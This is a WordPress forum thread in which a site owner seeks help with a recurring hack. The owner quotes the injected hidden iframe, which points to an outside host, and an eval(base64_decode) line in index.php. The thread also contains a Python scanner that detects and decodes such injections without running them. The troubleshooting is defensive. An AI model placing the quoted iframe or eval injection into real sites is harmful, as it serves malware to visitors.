
How am I still getting hacked? (17 posts)

  1. drummergirl
    Member
    Posted 11 months ago #

    Hello - I have a site that's been running for 5 years and never been hacked. Yesterday, I noticed some code had been inserted at the very top of my header that looks like this:

    <iframe src="http://ghxwfea.cz.cc/go/1" width="1" height="1"></iframe><br />
    
    <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/girlcaw6/public_html/index.php(1) : eval()'d code:37) in <b>/home/girlcaw6/public_html/wp-content/plugins/bad-behavior/bad-behavior/screener.inc.php</b> on line <b>8</b><br />

    The code is not in my header.php theme file, but is rendered when the site loads. Reinstalling WordPress 3.1.3 gets rid of it, but within a couple of hours it is back. Last night I reset all my FTP passwords, but this morning it still shows the bad code.

    Disabling plugins does not remove the iframe; however, disabling Bad Behavior does kill the warning message. Is the Bad Behavior plugin the problem or is it just conflicting with the hack? What else can I do to keep this from happening?

  2. drummergirl
    Member
    Posted 11 months ago #

    Still happening every hour. Plugins are updated, as is WP. All unused plugins have been deleted. FTP passwords changed.

    Anywhere else I should look? I'm currently scanning my files to see where it's being inserted.

  3. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

  4. govpatel
    Member
    Posted 11 months ago #

    I would check your own computer to see if you are infected. If that is OK, then if you are on a shared host account, check with your host.

  5. drummergirl
    Member
    Posted 11 months ago #

    I'm on a Mac and it came up clean. The site is on my VPS and none of my other sites on the same VPS are affected. Is there anything else I should check?

  6. drummergirl
    Member
    Posted 11 months ago #

    Ok MacKeeper anti-virus just alerted me to a chrome cache file:

    infected.webpage.gen

    That's just a cache file from my site, right? That wouldn't be the root cause, correct?

  7. drummergirl
    Member
    Posted 11 months ago #

    Day #3 and it's still showing up...

    Mac scanned - no issues other than my site's pages getting flagged in chrome cache

    Windows VM scanned - no issues

    All site files downloaded and scanned - nothing found

    FTP password changed, admin password changed.

    Any other ideas?

  8. brightim
    Member
    Posted 11 months ago #

    You may want to look closer at Bad Behavior. It may be behaving badly.

    http://dilithiumcrystalworks.com/2011/02/27/bad-behavior-wordpress-plugin/

  9. smrdo
    Member
    Posted 11 months ago #

    Try this plugin on your WP install: http://wordpress.org/extend/plugins/antivirus/

    We had this iframe injection on one of our sites too. Do a search across all the site files, the WP install, everything, for the iframe. Ours was embedded at the top of one of the WordPress include PHP files, can't remember which one now. Once found, delete it.

    It makes sense to change all your usernames & passwords too.

    Also check out some of the security plugins for WP.

  10. drummergirl
    Member
    Posted 11 months ago #

    @brightim - I removed bad behavior completely last night, but I was hacked again this morning.

    @smrdo - I ran that already. Didn't find anything. :/

    I have narrowed it down to the index.php as the only file being affected whenever it happens. I just need to figure out what is triggering it.

    At the moment I submitted a ticket to my VPS company to run a full scan on my server.

  11. songdogtech
    Member
    Posted 11 months ago #

    Securing a VPS is usually entirely different than inexpensive shared hosting. You're going to have to get the VPS company - or learn yourself on how - to dig in and fix the security problems with ports, permissions, MySQL, etc.

  12. drummergirl
    Member
    Posted 11 months ago #

    I may have to pay them to manage it. I got kicked off shared hosting because my site grew too big. I'm not on a VPS because I want to be there. :/

  13. drummergirl
    Member
    Posted 11 months ago #

    Just happened again:

    this is what is inserted into the index.php file:

    eval(base64_decode('...yada yada yada....'));

    How do I track down where it is coming from? All passwords have been changed. I've scanned my wp-content folder both online and off. Ideas?
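The search suggested in post 9, narrowed to the `eval(base64_decode(...))` wrapper reported in post 13, can be done without running any of the PHP. The following is an added example, not code from any poster in this thread: it walks a web root, reports the file and line of each wrapper, and decodes the payload as data to show which iframe tags it would emit. The sample tree, the `example.invalid` URL and all function names are constructed for illustration.

```python
import base64
import os
import re

# eval(base64_decode('...')) with either quote style and optional whitespace
INJECT_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.IGNORECASE)

def decode_payload(b64, max_layers=5):
    """Unwrap nested eval(base64_decode(...)) layers as data; nothing is executed."""
    data = b64
    for _ in range(max_layers):
        try:
            data = base64.b64decode(data)
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            break
        inner = INJECT_RE.search(data)
        if not inner:
            break
        data = inner.group(2)
    return data

def scan_tree(root):
    """Return (relative path, line number, iframe tags) for each injected call."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                src = fh.read()
            for m in INJECT_RE.finditer(src):
                decoded = decode_payload(m.group(2))
                tags = [t.decode("latin-1") for t in IFRAME_RE.findall(decoded)]
                line = src.count(b"\n", 0, m.start()) + 1
                findings.append((os.path.relpath(path, root), line, tags))
    return findings

def build_sample(root):
    """Constructed sample tree: one injected index.php and one clean include."""
    payload = b"echo '<iframe src=\"http://example.invalid/go/1\" width=\"1\" height=\"1\"></iframe>';"
    inject = b"<?php eval(base64_decode('" + base64.b64encode(payload) + b"')); ?>"
    os.makedirs(os.path.join(root, "wp-includes"))
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(inject + b"\n<?php require('./wp-blog-header.php');\n")
    with open(os.path.join(root, "wp-includes", "clean.php"), "wb") as fh:
        fh.write(b"<?php $x = base64_decode('aGVsbG8='); // decode only, no eval\n")
```

A hit identifies which file to restore, and that file's modification time is the timestamp to compare against the web server, FTP and SSH logs when looking for what rewrote it.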

  14. drummergirl
    Member
    Posted 11 months ago #

    Can I chmod that file to keep it from getting changed or will that prevent wordpress from working properly?

  15. songdogtech
    Member
    Posted 11 months ago #

    Please edit your post and delete the php code.

    Possible causes: open ports that shouldn't be open. PHP configs that make you vulnerable. Wrong file/folder permissions. SSH attacks. Attacks from other sites on your VPS. Malware in the database. Old plugins. FTP instead of SFTP.

  16. songdogtech
    Member
    Posted 11 months ago #

    > Can I chmod that file to keep it from getting changed or will that prevent wordpress from working properly?

    Simply a bandaid and a waste of time - if it happens to work.

  17. drummergirl
    Member
    Posted 11 months ago #

    I agree it's a bandaid - I'm just concerned about not resolving this before I have to leave on a trip next week.

    If the bandaid would get me through a few days of no internet access, it may be my only option until I return. Still waiting on the VPS techs to report back to me.
